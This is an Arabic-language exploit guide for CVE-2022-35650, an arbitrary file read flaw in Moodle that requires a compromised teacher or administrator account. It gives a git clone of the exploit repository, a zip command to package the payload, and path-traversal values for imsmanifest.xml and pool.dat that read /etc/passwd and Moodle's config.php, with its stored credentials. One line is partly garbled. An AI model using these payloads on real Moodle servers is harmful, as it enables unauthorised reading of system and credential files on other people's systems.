
استغلال لـ CVE-2022-35650، وهي ثغرة قراءة ملفات تعسفية في Moodle.
هذه قراءة ملف تعسفية في مودل.
يجب أن تكون قد اخترقت مستخدمًا بمستوى معلم أو مسؤول.
git clone https://github.com/Gr4y-r0se/CVE-2022-35650.git
zip exploit.zip imsmanifest.xml pool.dat
__passwd)./etc/passwd.إذا أردت قراءة ملف الإعدادات (مع بيانات اعتماد قيّمة)، عيّن baseurl في imsmanifest.xml إلى ما يلي:
../../../../../../../../../../../var/www/html
وعيّن src لوسم img في pool.dat إلى:
muc/config.php